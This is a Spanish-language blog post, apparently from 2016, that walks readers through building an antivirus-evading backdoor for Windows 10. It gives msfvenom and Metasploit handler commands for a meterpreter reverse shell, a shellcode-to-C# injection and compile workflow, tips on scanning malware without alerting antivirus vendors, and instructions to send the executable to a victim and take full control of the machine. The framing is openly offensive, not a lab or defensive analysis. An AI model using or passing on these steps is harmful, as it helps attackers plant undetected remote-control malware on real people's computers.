Tomando el control de un Windows 10

Comparto una simple forma de generar un backdoor indetectable para Windows 10. Me pareció un buen procedimiento sin tantas vueltas. A la fuente original (del colega CreadPag) voy a corregir algunas líneas para poder entender mejor.

El otro día estaba jugando con un backdoor que era indetectable para todos los AV’s; pero como hay personas que scanean su malware antes de usarlo en ataque, algunos de ellos cometen el error de publicarlo en VirusTotal. Recuerda que es una empresa que reporta, obviamente que por dinero, el malware a las empresas de AV.

Aquí hay dos paginas donde puedes scanearlo y que no sea compartido para esas compañías de antivirus.

Screenshot from 2016-02-26 13-28-33

Aquí puedes encontrar esta pagina se llama https://virusscan.jotti.org

Screenshot from 2016-02-26 13-28-27

Tienes otra compañía que también lo hace: http://nodistribute.com

Volviendo al tema, en nuestro método vamos a combinar Windows 7 con Kali Linux 2016.1 para atacar un Windows 10.
¿Por qué Windows 7? Porque vamos a compilar un archivo .bin a .cs (C#), en el cual vamos a utilizar una pequeña herramienta que se necesita tener el framework de .NET (disponible desde AQUÍ). Todas las dudas aclaradas, comencemos:

Primero vamos crear el backdoor en código binario con extensión .bin.

Vamos a nuestra terminal de Kali

 msfvenom -p windows/meterpreter/reverse_tcp lhost=(NUESTRA IP) lport=(PUERTO) -t raw -o /root/Desktop/example.bin

En este caso lo guarde en el Desktop. Para transportar el archivo, vamos a usar SimpleHTTPServer.

 python -m SimpleHTTPServer 8080

Con la ubicación de la herramienta vamos a transportar el archivo y vamos transformarlo en .cs.
Podemos descargar el archivo desde aquí .

Screenshot from 2016-02-26 13-43-32
En mi caso lo tengo en la carpeta Download:

cd /user/CreadPag/Download/hanzoInjection-master

Y ejecutamos el .exe desde la terminal. Recuerden: colocar el archivo creado example.bin en la misma carpeta donde corre el programa Hanzo

 HanzoInjection.exe -p example.bin -o injection_memory.cs

Screenshot from 2016-02-26 13-45-41

Ahora vamos compilar el archivo .cs en Kali Linux. Pueden seguir en windows usando Visual Studio o seguimos en Kali, con el programa MonoDevelop (si usan Mac, pueden utilizar Xamarin Studio).

 apt-get install monodevelop 

Lo descargamos para poder compilar el archivo .cs y obtener así el archivo .exe. Ahora vamos a abrir el programa:

Screenshot from 2016-02-26 12-58-35

Creamos un nuevo proyecto: En mi caso vamos a NETConsole Proyect – C#

Borramos el código del proyecto y copiamos el código del archivo .cs

Screenshot from 2016-02-26 13-00-39

Lo vamos a compilar y nos muestra dos enormes errores pero tranquilo vamos a solucionarlo.

Primer error:

Vamos a Proyect General – donde en el final dice “Allow ‘unsafe’ code” (hay que seleccionarlo).

Screenshot from 2016-02-26 13-00-52

Segundo error para la solución:

Vamos a Referencia – Editar y vamos al final a buscar “System.Xml” y aceptamos.

Screenshot from 2016-02-26 13-01-47

Ahora el programa va a compilar y nos ha creado una archivo .exe

Screenshot from 2016-02-26 13-57-28
Ahora simplemente vamos a enviar el archivo a la victima de Windows 10. Solo queda la consola de meterpreter. Como ya sabes el mismo procedimiento:

 msfconsole
 use multi/handler
 set payload windows/meterpreter/reverse_tcp
set lhost (NUESTRA IP)
set lport (MISMO PUERTO DECLARADO ANTES EN EL BACKDOOR)
 exploit -j

Cuando la víctima ejecute nuestro malware, terminaremos tomando el control total de su máquina:

Screenshot from 2016-02-26 14-00-52

Screenshot from 2016-02-26 14-00-43

Fuente original: CreadPag

DynamicSec.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s